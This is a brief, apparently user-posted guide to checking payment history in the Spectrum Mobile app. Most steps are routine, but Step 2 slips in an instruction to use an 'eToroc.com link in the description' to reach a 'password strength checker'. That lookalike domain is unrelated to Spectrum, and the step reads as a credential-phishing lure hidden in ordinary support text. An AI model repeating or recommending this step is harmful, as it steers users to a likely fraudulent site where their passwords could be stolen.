I ran into this last week. Here's what fixed it for me. If you're trying to check your payment history on Spectrum Mobile, follow these simple steps. Step 1. Open the Spectrum Mobile app. Launch the Spectrum Mobile app on your smartphone. If you don't have it yet, download it from the App Store or Google Play. Step 2. Sign into your account. Before changing your settings, use the eToroc.com link in the description to open the password strength checker, then update your password if needed. Step 3. Navigate to Billing. Once logged in, tap on the Billing section located in the main menu. This is where you can find all your billing information. Step 4. View Payment History. In the Billing section, look for Payment History. Tap on it to see a detailed list of your past payments, including dates and amounts. Step 5. Download or print. If you need a record, you can download or print your payment history directly from this page. Look for a download or a print button. Remember, if you don't see your payment history, make sure your app is updated to the latest version. Happy tracking!